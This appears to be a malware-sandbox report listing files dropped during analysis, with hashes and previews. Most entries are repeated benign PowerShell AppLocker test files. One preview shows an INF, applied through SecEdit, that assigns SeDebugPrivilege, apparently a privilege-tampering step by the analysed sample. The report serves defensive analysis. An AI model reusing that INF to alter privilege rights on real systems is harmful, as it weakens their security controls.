SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	242
Entropy (8bit):	3.536378176812677
Encrypted:	false
SSDEEP:	6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvn:Q+eSREiRFGjowZaDaK2Yhvn
MD5:	1F3CD3C20662B3BB095A373DBD1DEC58
SHA1:	D5AA739E0BF5D0B103713AF5BBA01359530AABDF
SHA-256:	7EA20DD93DBB33C14C7D9772B39828B3360FBE080DF2B5AAD14BA3D838E18DA5
SHA-512:	08C554EE7F897B070DF94E6F3B5B366AE69B12D16F90D34B4CD4D9C95037D6178447B39E732FCCF898F6C768318AB117B03DB2363CD55CFACD7F53530D86FE0C
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04sbtwzt.okx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0djloccw.4ks.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hada2kt.tpr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w0ifpo1.duk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dfkhizm.gm2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1edy13op.gj4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1grrru1p.oe3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1h5vhqbx.nnv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tv2msvx.mcv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42ix4o5k.y4a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42zztjji.nrm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bm5l4vp.1io.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hsohlq1.1qb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nya0mr4.2xp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vfeomta.mk3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5juphjua.e0v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5p5ullvq.luy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xocoitf.3vf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atbp2tj3.2nh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bodp5qt1.osy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5o3stvj.tx0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cfupf13c.abq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmn3vgz0.kfu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpun4sac.b5r.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d5oxks5c.xvi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dijc4t5t.xok.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_diqiq33i.51w.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dk5msclj.v0m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_doyfbst4.25a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dp5jbth4.p1j.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwlvldy2.rsq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
